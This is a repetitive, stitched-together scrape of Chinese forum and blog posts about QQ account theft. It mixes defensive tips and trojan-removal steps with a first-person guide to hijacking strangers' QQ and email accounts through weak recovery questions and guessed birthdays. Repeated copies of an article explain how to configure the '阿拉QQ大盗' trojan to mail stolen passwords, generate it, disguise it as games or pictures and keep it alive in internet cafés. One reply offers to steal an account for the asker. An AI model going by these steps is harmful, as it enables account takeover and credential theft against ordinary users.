运行sinffer之前,我们需要安装WinPcap驱动,否则sinffer将不能正常运行。
运行sinffer。首先我们需要为sinffer.exe指定一块网卡,点击工具栏上的网卡图标,在弹出的窗口中选择自己使用的网卡,点“OK”后即可完成配置。确定以上配置后,点击sinffer工具栏中的“开始”按钮,软件即开始了嗅探工作。
接下来,我们正常登陆QQ,如果嗅探成功,就会在sinffer的界面中出现捕获的数据包,其中邮箱帐号密码信息被很清晰得罗列了出来。
得到盗号者的邮箱帐号和密码以后,我们可以将其中的QQ号码信息邮件全部删除,或者修改他的邮箱密码,给盗号者一个教训,让我们菜鸟也正义一把.
http://blog.sina.com.cn/u/4c611bf3010008lh
QQ被盗而且2代密码问题也被改了、怎么办
我给你推荐一个盗QQ的简易方法。不过对于那些对QQ没有防范的那更加容易了,如果盗的是高手的,那可要花些时间了。 既然不用软件,那肯定不能猜密码了。所以只能先去盗邮箱。本人已经盗了30多个QQ了,都是用这种方法。首先查找看谁在线上,然后看资料,看看他的邮箱是什么。盗邮箱只需要破提示问题的有新浪的和搜狐的,而搜狐的就更爽了,破开后直接显示邮箱密码,而不必马上要填密码,如果密码很长,说不定和QQ密码一样,我盗了几个7位数就是这样。如果和QQ密码不一样,再试其他方法,先改密码再说,然后查看他的个人资料,生日和身份证号很重要,记下来再说。然后再去破他的QQ,先看他有没有申请密码保护,申请了最好,点取回QQ密码,看他的提示问题答案是不是很简单,简单那好办,发送密码后去看看你盗的邮箱是不是有密码,一般网虫们是不会把搜狐的邮箱去接收密码的,新浪的很有可能,所以希望很大,如果没有接收到密码,他肯定还有别的邮箱了,如果找不到别的邮箱,只能享受一下盗邮箱的乐趣了。
有些人喜欢把邮箱帐号都填的一样,密码也一样,所以盗了一个,基本上所有邮箱就全没了。身份证号是用来修改别人的QQ密码保护资料的,修改不了也不要担心,有些人连当初申请保护时填的资料都忘记了,所以想要也要不回了。有时把密码改成汉字也可以迷惑别人,例如把密码改成“隐藏密码无法取回”,搞的别人收到密码还纳闷。哈~~~ 如果破邮箱要生日也好办,看他资料上有没有年龄和星座,如果资料真实试几次就破开了,然后再破提示问题。 如果你很懒,就像我一样,生日都懒的破的话,那就直接从搜狐破起吧,看他有没有申请同帐号的搜狐邮箱,申请了就去破吧。点忘记密码再破,说不定问题和答案是一样就好说了。注意,破新浪的邮箱时如果密码提示问题很简单,先不要破,先把他密码发送到他邮箱里然后再破,说不定就是QQ密码。
不管破开什么邮箱,看看里面的邮件,有什么注册确认的,就能找到登陆密码,密码也在QQ上试试。 qq9750406大多数网虫是在网吧上网,很多网吧都有不允许下载的设置,这使得大多数想盗QQ的朋友们无从下手,我今天就把如何不用软件盗QQ的具体步骤写下来。首先打开腾讯的IE浏览器,这样切换网页会比较方便。先查找看谁在线上,查看他的QQ资料,看是否有邮箱写在上面。我下面只介绍以搜狐和新浪邮箱为突破口,因为此2种邮箱无须破生日。记下他的邮箱,如果是新浪的,你先打开此网页http://members.sina.com.cn/remindme.html 在方法二最下面方法二填好新浪代号,然后确定。有很多人的提示问题很答案是一样的,例如问题是123,答案也是123,很容易被盗。如果你想知道他邮箱密码也很容易,在方法一里填上代号和邮箱地址,在发送即可,邮箱地址就是你要盗的新浪邮箱。盗开后看他邮件里有没有什么注册确认信,有QQ密码保护资料那更好了,提示问题答案知道了,邮箱也在你手里,只须取回QQ密码即告到手。
如果没有找到什么线索,记录下他的生日和身份证号,有就记,没有也罢,根据他的生日去破同帐号的其他邮箱,163或263的,没有就宣告破产咯。所以我还是想说先把他邮箱密码发送到他邮箱里,用一个密码开他所有邮箱,碰碰运气吧。若你盗的是搜狐的,就打开这个网站http://login.mail.sohu.com/ 点忘了密码,怎么破我就不再说了,破开后密码直接显示出来,你就先去试试能不能开他的QQ,不能开再想其他方法。我举个例子,假如你发现他的邮箱是这样写的football2002@163.com
163的邮箱一般是不好破的,所以你先试着去破football2002@sohu.com或者是football2002@sina.com,看能不能得手,得手更好。有的人把生日就填在帐号上,例如wyh821010@263.net,那你基本就知道他的生日了,机会不能错过,去干掉他吧。当你盗了一个QQ后,不要立即停止,因为在你盗的QQ号里面,有这个人其他QQ也在里面,去查看他的好友资料,资料相似的就是他了,若你懒的找,再试另一个方法,去下定义查找,用通过邮箱方式的方法查,说不定可以查到他的其余的QQ,QQ密码一般都是一样,全打开吧。由于不用软件,所以盗QQ时间可能会花的很长,那些不懂的用软件的朋友们完全可以接受这种方法,如果你上网通宵的话,运气再差也可以盗5个QQ,不信你试试。
全傻瓜式盗Q号,不用木马,不论远近,只要你有心.
当你看见哪个好QQ,号码你又很想要的,有空的话,你可以一试运气,有两个重要前提:5W'~ `"M$j,w z
一:是对方要有邮箱,但又不能是QQ邮箱和GMAIL和HOTMAIL的.X7a V u q/]1]V-m F
二:你能通过空间或QQ家园的个人介绍看见他的出生年月日(有的邮箱就有生日,比方love19871006@163.com,很显然,他的生日就是"1987年10月06日,至少他注册这邮箱的就是这生日,大家都知道的,当你要找回帐号密码的时候大部分都要输入生日的)9@ m c Z9E }
当你有了这两个条件的时候,你能盗号的几率就达到一半了,大家看我做的一步一步来,先,有了他生日,就去他的邮箱所在的官方网站,然后点"找回密码"或"密码寻回",进了后,记得要选"通过生日和提示问题找回".然后填他的生日,如果是错的,那你就自己想办法了,如果生日对了,就进下一步,回答他的问题,通常那些都是些**问题,这时候就要看你的社会工程学如何了,比方嘛,他的问题是"123?"那么他的答案就有可能是"456789"或"321"不等,或者就是"我的生日?"和"我叫什麽名字?”,我真晕,这些**问题简直都有点侮辱人的IQ,记得,不要嫌麻烦,这样总比你用盗号软件盗来又被别人找回去的好,只要你搞定他的邮箱,他的QQ差不多就是你的啦,好了,废话不多说,进了邮箱后,就进入了**阶段,先要看他的邮箱个人资料,再把他的邮箱密码和密保改了,但你一定要记得他的资料,有些是很重要的,记好改好后,就去看他邮箱有没有QQGM发给他的申请密码保护的资料,有的话,你就发了,没有也别灰心,去QQ官方点找回密码,一样的,回答了他的傻瓜问题,密码就发在刚搞定的邮箱里面了,好,一切搞定,不行也别灰心,可以在QQ查找好友里面多选几个合适的.我已经搞了几个自己最喜欢的啦,能不能盗得就看你自己运气了
页: [1]
查看完整版本: 全傻瓜式盗Q号,不用木马,不论远近,只要你有心.
Powered by Discuz! Archiver 6.0.0 © 2001-2006 Comsenz Inc.
http://www.djcg.cn/mailseehelp/mailseehelp.htm
MailSee 邮箱密码查看器 电脑远程监控
http://www.djcg.cn/
啊拉QQ大盗
菜鸟反击战,粉碎QQ盗号阴谋+QQ密码防盗十大建议』
http://www.heishou.cn/data/soft/230.html啊拉QQ大盗
最近QQ号老是被盗。邮箱密码都被人偷了,气得我要命。所以找了些资料,给大家都看看。
很多朋友都有过QQ号被盗的经历,即使用“密码保护”功能找回来后,里面的Q币也已经被盗号者洗劫一空,碰到更恶毒的盗号者,还会将你的好友统统删除,朋友们将会永远得离开你。想过反击吗?什么,反击?别开玩笑了,我们只是菜鸟,不是黑客,我们只会看看网页,聊聊天,连QQ号是怎么被盗的都不知道,还能把盗号者怎么样呢?其实喜欢盗号的所谓“黑客”们,也只是利用了一些现成的盗号工具,只要我们了解了QQ号被盗的过程,就能作出相应防范,甚至由守转攻,给盗号者以致命一击。
一、知己知彼,盗号技术不再神秘
如今,还在持续更新的QQ盗号软件已经所剩无几,其中最为著名,流传最广的则非“啊拉QQ大盗”莫属,目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单,只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种,并将它们分别发送到不同的信箱中,这也是“啊拉QQ大盗”如此流行的原因之一。接下来,便让我们先来了解一下其工作原理,以便从中找到反击的良方。
1、选择盗号模式
下载“啊拉QQ大盗”,解压后有两个文件:alaqq.exe、tmdqq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序,tmdqq.asp是使用“网站收信”模式时需使用的文件。正式使用之前,还需要设置其参数。
“邮箱收信”配置:运行alaqq.exe,出现程序的配置界面(如图1)。在“发信模式选择”选项中选中“邮箱收信”,在“邮箱收信”填写电子邮箱地址(建议使用程序默认的163.com网易的邮箱)。这里以笔者的邮箱nl297@163.com(密码piaohubuding)为例来介绍“邮箱收信”模式时的配置,并进行下文中的测试。此外,在“收信箱(靓)”和“收信箱(普)”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器,这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。
图1 配置“啊拉QQ大盗”参数
设置完毕后,我们可以来测试一下填写的内容是否正确,点击下方“测试邮箱”按钮,程序将会出现邮箱测试状态(如图2)。如果测试的项目都显示成功,即可完成邮箱信息配置。
图2 参数配置测试成功
“网站收信”配置:除了选择“邮箱收信”模式之外,我们还可以选择“网站收信”模式,让盗取的QQ号码自动上传到指定的网站空间。当然,在使用之前,也需要做一些准备工作。
用FTP软件将tmdqq.asp上传支持ASP脚本的空间,运行alaqq.exe,在“Asp接口地址”中输入tmdqq.asp所在的URL地址,那么,当木马截获QQ号码信息后,就会将其保存于tmdqq.asp同目录下的qq.txt文件中。
2、设置木马附加参数
接下来我们进行高级设置。如果勾选“运行后关闭QQ”,对方一旦运行“啊拉QQ大盗”生成的木马,QQ将会在60秒后自动关闭,当对方再次登录QQ后,其QQ号码和密码会被木马所截获,并发送到盗号者的邮箱或网站空间中。此外,如果希望该木马被用于网吧环境,那就需要勾选“还原精灵自动转存”,以便系统重起后仍能运行木马。除这两项外,其他保持默认即可。
3、盗取QQ号码信息
配置完“啊拉QQ大盗”,点击程序界面中的“生成木马”,即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏,或者和其他软件捆绑后进行传播。当有人运行相应的文件后,木马会隐藏到系统中,当系统中有QQ登录时,木马便会开始工作,将相关的号码及密码截取,并按照此前的设置,将这些信息发送到邮箱或者网站空间。
二、练就慧眼,让木马在系统中无处可逃
现在,我们已经了解了“啊拉QQ大盗”的一般流程,那么如何才能从系统中发现“啊拉QQ大盗”呢?一般来说,如果碰到了以下几种情况,那就应该小心了。
•QQ自动关闭。
•运行某一程序后其自身消失不见。
•运行某一程序后杀毒软件自动关闭。
•访问杀毒软件网站时浏览器被自动关闭。
•如果杀毒软件有邮件监控功能的,出现程序发送邮件的警告框。
•安装有网络防火墙(例如天网防火墙),出现NTdhcp.exe访问网络的警告(如图3)。
图3 网络防火墙发出警告
出现上述情况的一种或多种,系统就有可能已经感染了“啊拉QQ大盗”。
当然,感染了木马并不可怕,我们同样可以将其从系统中清除出去。
1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件,并在注册表的启动项中加入木马的键值,以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”,结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”,选择其中的“查看”标签,将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹,将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值,该键值位于HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run。
2、卸载木马。卸载“啊拉QQ大盗”很简单,只要下载“啊拉QQ大盗”的配置程序,运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。
三、以退为进,给盗号者以致命一击
忙乎了半天,终于把系统中的“啊拉QQ大盗”彻底清除,那么,面对可恶的盗号者,我们是不是应该给他一个教训呢?
1、利用漏洞,由守转攻
这里所谓的“攻”,并不是直接入侵盗号者的电脑,相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手,从而给盗号者一个教训。
那么这个漏洞是什么呢?
从此前对“啊拉QQ大盗”的分析中可以看到,配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码,而邮箱的帐号和密码都是明文保存在木马程序中的。因此,我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱,让盗号者偷鸡不成反蚀把米。
提示:以上漏洞仅存在于将QQ号码信息以邮件发送方式的木马,如果在配置“啊拉QQ大盗”的过程中选择使用网站接收的方式则不存在该漏洞。
2、网络嗅探,反夺盗号者邮箱
当木马截取到QQ号码和密码后,会将这些信息以电子邮件的形式发送到盗号者的邮箱,我们可以从这里入手,在木马发送邮件的过程中将网络数据包截取下来,这个被截获的数据包中就含有盗号者邮箱的帐号和密码。截取数据包时我们可以使用一些网络嗅探软件,这些嗅探软件可以很轻松得截取数据包并自动过滤出密码信息。
•x-sniff
x-sniff是一款命令行下的嗅探工具,嗅探能力十分强大,尤其适合嗅探数据包中的密码信息。
将下载下来的x-sniff解压到某个目录中,例如“c:\”,然后运行“命令提示符”,在“命令提示符”中进入x-sniff所在的目录,然后输入命令“xsiff.exe -pass -hide -log pass.log”即可(命令含义:在后台运行x-sniff,从数据包中过滤出密码信息,并将嗅探到的密码信息保存到同目录下的pass.log文件中)。
嗅探软件设置完毕,我们就可以正常登录QQ。此时,木马也开始运行起来,但由于我们已经运行x-sniff,木马发出的信息都将被截取。稍等片刻后,进入x-sniff所在的文件夹,打开pass.log,便可以发现x-sniff已经成功嗅探到邮箱的帐户和密码(如图4)。
图4 成功截取盗号者邮箱信息
•sinffer
可能很多朋友对命令行下的东西都有一种恐惧感,所以我们可以使用图形化的嗅探工具来进行嗅探。例如适合新手使用的sinffer。
运行sinffer之前,我们需要安装WinPcap驱动,否则sinffer将不能正常运行。
运行sinffer。首先我们需要为sinffer.exe指定一块网卡,点击工具栏上的网卡图标,在弹出的窗口中选择自己使用的网卡,点“OK”后即可完成配置(如图5)。确定以上配置后,点击sinffer工具栏中的“开始”按钮,软件即开始了嗅探工作。
图5 为sinffer绑定网卡
接下来,我们正常登陆QQ,如果嗅探成功,就会在sinffer的界面中出现捕获的数据包,其中邮箱帐号密码信息被很清晰得罗列了出来。
得到盗号者的邮箱帐号和密码以后,我们可以将其中的QQ号码信息邮件全部删除,或者修改他的邮箱密码,给盗号者一个教训,让我们菜鸟也正义一把。
盗Q木马病毒横行 QQ密码加密技术早已没用了
相信大家都不想哪天登陆QQ的时候,发现服务器提示密码错误?QQ财产被盗?好友资料被删吧?。。。
如果不想那请大家都看看,有备无患
QQ密码防盗十大建议
1. 去腾讯申请密码保护,这样如果密码被破解或自己忘记了还可以利用密码保护功能取回来。
2. QQ的密码的位数一定要超过8位,而且最好包含数字+字母+特殊符号,否则以现代计算机的超强计算能力,要想暴力破解你的QQ密码简直是易如反掌。
3. 不要在QQ中填入真实的年龄、E-mail等敏感消息,更不能告诉任何人,小心行得万年船。
4. 不要随意运行别人发给你的文件,即便那些看起来很诱人的文件也不要轻易地去运行它,往往这样的文件后面都隐藏着不可告人的秘密和危险。
5. 在网吧上网临走时一定要删除QQ的聊天记录,最好把以你的QQ号码命名的文件夹整个删除,而且要清空回收站。
6. 注意使用最新版本的QQ,针对QQ的攻击工具大都是针对某一版本的,它的更新不会比QQ的版本升级速度更新更快。
7. 隐藏自己的真实IP,通过代理服务器上网,可以减少别人发现自己的机会,进而避免被别人攻击。当然对于黑客高手这招用处不太大,值得庆幸的是高手并不是很多。
8. 事先准备两个常用的密码,登入QQ时使用一个,在使用完毕后右键点击屏幕右下角的QQ图标,选择“个人设定”→“网络安全”→“修改口令”,在“新口令”栏中输入另外一个事先准备好的密码,然后点击“确定”保存修改结果,这样可以防大多数的QQ木马,因为QQ木马大都只记录你登陆时输入的密码,对下线前修改的密码却疏于记录。
9. 用汉字做QQ的密码使键盘记录机失效。由于绝大部分键盘记录机都只是对键盘输入进行记录,而不能对剪贴板中的密码做记录,所以,如果采用复制的方式拷贝事先准备好的汉字作为QQ密码,则几乎没有被键盘记录机盗取QQ密码的可能,也就没有后顾之忧了。
10. 使用进程管理软件防QQ密码被盗。记录QQ密码的木马是很隐蔽的,通过按Ctrl+Alt+Del来发现它们是不大可能的。此时,拥有一款进程管理软件就显得很必要,因为以目前的木马程序的编写水平,大多数还无法做到隐藏其进程,所以用进程管理软件就可以发现它们,然后终止该进程则可以有效地防范木马。之后,我们就可以放心大胆地去使用QQ了。
分析QQ被盗原因及找回方法
根据我个人经验:
1:中木马被盗,要么就是你上的机本来就有木马,要不就是就浏览网站的时候中的(中这马时,很难查觉,它为自动关了你的QQ,这时你可以注意了千万不要再登陆了此时的木马已经开始记录你的信息),所以再有还原软件的情况下你最好重启一下机子再登陆有些马连还原软件都要过的这时你必需得杀毒啊手动删除这些马,要在注册表里清除!
2:盗号者利用大家的坏习惯,比如说你的QQ密码和你常去网站(比如一些论坛)的登陆密码一样人家得到了那网站的数据据库就相当于得到了你的QQ密码,怕了吧所以大家的密码最好不要弄一个,不然自己的QQ怎么被盗的都不知道呢!
被盗后:当QQ被盗后不要马上查毒,用嗅探工具查查木马发送的邮箱和邮箱密码,这样去它邮箱里找回密码还可以把它的邮箱密码改了,也可以去申请密码保护去用密码保护找回,申请诉讼也行的,不过好难的
从今日起,因为如下原因:
1、被病毒或木马窃取了密码。
2、中了尾巴病毒。
3、被挂机或钓鱼网站利用。
4、使用非官方软件。
QQ号将被冻结,须到http://activate.qq.com/进行激活。从第四条可以看出,我们已不能使用其它改版QQ,如珊瑚虫、XX专用版等。想来这些版本借QQ扬名得利,未向腾讯“纳供”;腾讯也不会坐视不管,所以出兵围剿,也在情理之中。然为利相争历来是不绝的传奇,那些改版QQ又会做出什么样的反击措施呢?我们拭目以待,看这场QQ春秋如何演义。
找回被盗QQ号里的好友
时下,QQ盗号让人防不胜防,一不小心QQ号就被盗了。号盗了没什么,但如果里面的朋友没了,那可就是大事了。下面几招可帮您找回被盗QQ号里的好友。
1、首先必须保证你的电脑中保存着被盗的QQ号登录记录,也就是安装目录中包含这个号码为目录名的子目录。
2、然后去申请新的QQ号。
3、将被盗的QQ号子目录的user.db文件复制到新申请号码命名的子目录中,覆盖同名文件。
4、登录新号,此时发现被盗QQ号的好友都已经出现在新号码好友列表中,不过状态是“离线”将他们全选(ctrl+A)拖到“陌生人”组里,弹出的N个确认框中点“确定”,直到这些好友被全部删除。
5、将“陌生人”中的好友全选,再拖回到“我的好友”中,仍是对N个窗口点击确认直至完成所有好友添加。
这时你的好友全都到新号里了
附件内有
啊拉QQ大盗(版本好像很老的)
sinffer (http://www.effetech.com/aps/)
X-Sniff (简易的命令行方式嗅探器,可捕获局域网内FTP/SMTP/POP3/HTTP协议密码)
WinPcap_3_1 (http://www.winpcap.org/install/default.htm#graph_installer3_2a1)
以上都是集合文章中涉及的软件,如果怕的话大家可以不下ps病毒也有好的跟坏的
附件: 集合文章中涉及的软件下载.rar
你自己看看吧,不会的话你直接把号发出来我帮你用软件盗
QQ被盗!
教你找回被盗QQ和反攻盗号者的秘诀[实用技巧]-------------
一、知己知彼,盗号技术不再神秘如今,还在持续更新的QQ盗号软件已经所剩无几,其中最为著名,流传最广的则非“啊拉QQ大盗”莫属,目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单,只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种,并将它们分别发送到不同的信箱中,这也是“啊拉QQ大盗”如此流行的原因之一。接下来,便让我们先来了解一下其工作原理,以便从中找到反击的良方。1、选择盗号模式下载“啊拉QQ大盗”,解压后有两个文件:alaqq.exe、爱永恒,爱保姆qq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序,爱永恒,爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前,还需要设置其参数。“邮箱收信”配置:运行alaqq.exe,出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”,在“邮箱收信”填写电子邮箱地址(建议使用程序默认的163.com网易的邮箱)。这里以邮箱email=n12345@163.com]n12345@163.com(密码n_12345)为例来介绍“邮箱收信”模式时的配置,并进行下文中的测试。此外,在“收信箱(靓)”和“收信箱(普)”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器,这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。设置完毕后,我们可以来测试一下填写的内容是否正确,点击下方“测试邮箱”按钮,程序将会出现邮箱测试状态。如果测试的项目都显示成功,即可完成邮箱信息配置。“网站收信”配置:除了选择“邮箱收信”模式之外,我们还可以选择“网站收信”模式,让盗取的QQ号码自动上传到指定的网站空间。当然,在使用之前,也需要做一些准备工作。用FTP软件将爱永恒,爱保姆qq.asp上传支持ASP脚本的空间,运行alaqq.exe,在“Asp接口地址”中输入爱永恒,爱保姆qq.asp所在的URL地址,那么,当木马截获QQ号码信息后,就会将其保存于爱永恒,爱保姆qq.asp同目录下的qq.txt文件中。2、设置木马附加参数接下来我们进行高级设置。如果勾选“运行后关闭QQ”,对方一旦运行“啊拉QQ大盗”生成的木马,QQ将会在60秒后自动关闭,当对方再次登录QQ后,其QQ号码和密码会被木马所截获,并发送到盗号者的邮箱或网站空间中。此外,如果希望该木马被用于网吧环境,那就需要勾选“还原精灵自动转存”,以便系统重起后仍能运行木马。除这两项外,其他保持默认即可。3、盗取QQ号码信息配置完“啊拉QQ大盗”,点击程序界面中的“生成木马”,即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏,或者和其他软件安装运行后进行传播。当有人运行相应的文件后,木马会隐藏到系统中,当系统中有QQ登录时,木马便会开始工作,将相关的号码及密码截取,并按照此前的设置,将这些信息发送到邮箱或者网站空间。二、练就慧眼,让木马在系统中无处可逃现在,我们已经了解了“啊拉QQ大盗”的一般流程,那么如何才能从系统中发现“啊拉QQ大盗”呢?一般来说,如果碰到了以下几种情况,那就应该小心了。·QQ自动关闭。·运行某一程序后其自身消失不见。·运行某一程序后杀毒软件自动关闭。·访问杀毒软件网站时浏览器被自动关闭。·如果杀毒软件有邮件监控功能的,出现程序发送邮件的警告框。·安装有网络防火墙(例如天网防火墙),出现NTdhcp.exe访问网络的警告。出现上述情况的一种或多种,系统就有可能已经感染了“啊拉QQ大盗”。当然,感染了木马并不可怕,我们同样可以将其从系统中清除出去。1、手工查杀木马。发现系统感染了“啊拉QQ大盗”后我们可以手工将其清除。“啊拉QQ大盗”运行后会在系统目录中的system32文件夹下生成一个名为NTdhcp.exe的文件,并在注册表的启动项中加入木马的键值,以便每次系统启动都能运行木马。我们首先要做的就是运行“任务管理器”,结束其中的木马进程“NTdhcp.exe”。然后打开资源管理器中的“文件夹选项”,选择其中的“查看”标签,将其中“隐藏受保护的操作系统文件”选项前面的勾去掉。接着进入系统目录中的system32文件夹,将NTdhcp.exe文件删除。最后进入注册表删除NTdhcp.exe键值,该键值位于HKEY_LOCAL_MACHINE\Software \Microsoft \Windows \Currentversion \Run。2、卸载木马。卸载“啊拉QQ大盗”很简单,只要下载“啊拉QQ大盗”的配置程序,运行后点击其中的“卸载程序”按钮即可将木马完全清除出系统。三、以退为进,给盗号者以致命一击忙乎了半天,终于把系统中的“啊拉QQ大盗”彻底清除,那么,面对可恶的盗号者,我们是不是应该给他一个教训呢?1、利用漏洞,由守转攻这里所谓的“攻”,并不是直接入侵盗号者的电脑,相信这种“技术活”并不适合大家。这里只是从盗号软件几乎都存在的漏洞入手,从而给盗号者一个教训。那么这个漏洞是什么呢?从此前对“啊拉QQ大盗”的分析中可以看到,配置部分填写了收取QQ号码信息邮件的邮箱帐号和密码,而邮箱的帐号和密码都是明文保存在木马程序中的。因此,我们可以从生成的木马程序中找到盗号者的邮箱帐号和密码。进而轻松控制盗号者的邮箱,让盗号者偷鸡不成反蚀把米。提示:以上漏洞仅存在于将QQ号码信息以邮件发送方式的木马,如果在配置“啊拉QQ大盗”的过程中选择使用网站接收的方式则不存在该漏洞。2、网络嗅探,反夺盗号者邮箱当木马截取到QQ号码和密码后,会将这些信息以电子邮件的形式发送到盗号者的邮箱,我们可以从这里入手,在木马发送邮件的过程中将网络数据包截取下来,这个被截获的数据包中就含有盗号者邮箱的帐号和密码。截取数据包时我们可以使用一些网络嗅探软件,这些嗅探软件可以很轻松得截取数据包并自动过滤出密码信息。·x-sniffx-sniff是一款命令行下的嗅探工具,嗅探能力十分强大,尤其适合嗅探数据包中的密码信息。将下载下来的x-sniff解压到某个目录中,例如“c:\”,然后运行“命令提示符”,在“命令提示符”中进入x-sniff所在的目录,然后输入命令“xsiff.exe -pass -hide -log pass.log”即可(命令含义:在后台运行x-sniff,从数据包中过滤出密码信息,并将嗅探到的密码信息保存到同目录下的pass.log文件中)。嗅探软件设置完毕,我们就可以正常登录QQ。此时,木马也开始运行起来,但由于我们已经运行x-sniff,木马发出的信息都将被截取。稍等片刻后,进入x-sniff所在的文件夹,打开pass.log,便可以发现x-sniff已经成功嗅探到邮箱的帐户和密码。·sinffer可能很多朋友对命令行下的东西都有一种恐惧感,所以我们可以使用图形化的嗅探工具来进行嗅探。例如适合新手使用的sinffer。运行sinffer之前,我们需要安装WinPcap驱动,否则sinffer将不能正常运行。运行sinffer。首先我们需要为sinffer.exe指定一块网卡,点击工具栏上的网卡图标,在弹出的窗口中选择自己使用的网卡,点“OK”后即可完成配置。确定以上配置后,点击sinffer工具栏中的“开始”按钮,软件即开始了嗅探工作。接下来,我们正常登陆QQ,如果嗅探成功,就会在sinffer的界面出现捕获的数据包,其中邮箱帐号密码信息被很清晰得罗列了出来。得到盗号者的邮箱帐号和密码以后,我们可以将其中的QQ号码信息邮件全部删除,或者修改他的邮箱密码,给盗号者一个教训,让我们菜鸟也正义一把。
QQ丢了教你找回你的好友![实用技巧]-------------
QQ被盗后可以再去申请一个,但是QQ里面的好友却丢了,这给很多朋友带来了不必要的麻烦。下面我介绍一种方法把被盗QQ里的好友找回来,先确认你之前用的是手机QQ2007最新版(因为最新版的QQ好友和群文件都是保存在手机里的),然后用FileMan到E/system/apps/QQ2007,这时你是不是看到了有个文件夹的名称和你刚丢的Q号是一样的?申请新的QQ号码后,将这个文件夹的名称改成新申请的QQ号的号码,再登录新申请QQ号码,此时被盗QQ号码的全部好友都已经出现在新号码的好友列表中,你是不是发现他们的头像都是离线状态的?现在将其一个一个的在好友中删除,这时他们就会出现在“陌生人”组里,你再将“陌生人”组里的Q友重新一个一个的“加为好友”。再等你部份的QQ好友通过验证…好了!经过这几个步骤,现在你的QQ好友已经全部找回来了。用电脑好像也有类似的方法!
QQ被盗 可怜人求助 网络高手请进
教你夺回被人盗走的QQ号码!
很多朋友都有过QQ号被盗的经历,即使用“密码保护”功能找回来后,里面的Q币也已经被盗号者洗劫一空,碰到更恶毒的盗号者,还会将你的好友统统删除,朋友们将会永远得离开你。想过反击吗?什么,反击?别开玩笑了,我们只是菜鸟,不是黑客,我们只会看看网页,聊聊天,连QQ号是怎么被盗的都不知道,还能把盗号者怎么样呢?其实喜欢盗号的所谓“黑客”们,也只是利用了一些现成的盗号工具,只要我们了解了QQ号被盗的过程,就能作出相应防范,甚至由守转攻,给盗号者以致命一击。
一、知己知彼,盗号技术不再神秘
如今,还在持续更新的QQ盗号软件已经所剩无几,其中最为著名,流传最广的则非“啊拉QQ大盗”莫属,目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单,只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种,并将它们分别发送到不同的信箱中,这也是“啊拉QQ大盗”如此流行的原因之一。接下来,便让我们先来了解一下其工作原理,以便从中找到反击的良方。
1、选择盗号模式 QQ空间代码 http://www.e7qq.com
下载“啊拉QQ大盗”,解压后有两个文件:alaqq.exe、爱永恒,爱保姆qq.asp。其中alaqq.exe是“啊拉QQ大盗”的配置程序,爱永恒,爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前,还需要设置其参数。
“邮箱收信”配置:运行alaqq.exe,出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”,在“邮箱收信”填写电子邮箱地址(建议使用程序默认的163.com网易的邮箱)。这里以邮箱n12345@163.com(密码n_12345)为例来介绍“邮箱收信”模式时的配置,并进行下文中的测试。此外,在“收信箱(靓)”和“收信箱(普)”中可以填入不同的邮箱地址用来接受QQ靓号和普通QQ号。然后在“发信服务器”下拉框中选择自己邮箱相应的smtp服务器,这里是smtp.163.com。最后填入发信箱的帐号、密码、全称即可。
设置完毕后,我们可以来测试一下填写的内容是否正确,点击下方“测试邮箱”按钮,程序将会出现邮箱测试状态。如果测试的项目都显示成功,即可完成邮箱信息配置。
“网站收信”配置:除了选择“邮箱收信”模式之外,我们还可以选择“网站收信”模式,让盗取的QQ号码自动上传到指定的网站空间。当然,在使用之前,也需要做一些准备工作。
一起QQ www.e7qq.com
用FTP软件将爱永恒,爱保姆qq.asp上传支持ASP脚本的空间,运行alaqq.exe,在“Asp接口地址”中输入爱永恒,爱保姆qq.asp所在的URL地址,那么,当木马截获QQ号码信息后,就会将其保存于爱永恒,爱保姆qq.asp同目录下的qq.txt文件中。
2、设置木马附加参数
接下来我们进行高级设置。如果勾选“运行后关闭QQ”,对方一旦运行“啊拉QQ大盗”生成的木马,QQ将会在60秒后自动关闭,当对方再次登录QQ后,其QQ号码和密码会被木马所截获,并发送到盗号者的邮箱或网站空间中。此外,如果希望该木马被用于网吧环境,那就需要勾选“还原精灵自动转存”,以便系统重起后仍能运行木马。除这两项外,其他保持默认即可。
3、盗取QQ号码信息
配置完“啊拉QQ大盗”,点击程序界面中的“生成木马”,即可生成一个能盗取QQ号码的木马程序。我们可以将该程序伪装成图片、小游戏,或者和其他软件捆绑后进行传播。当有人运行相应的文件后,木马会隐藏到系统中,当系统中有QQ登录时,木马便会开始工作,将相关的号码及密码截取,并按照此前的设置,将这些信息发送到邮箱或者网站空间。
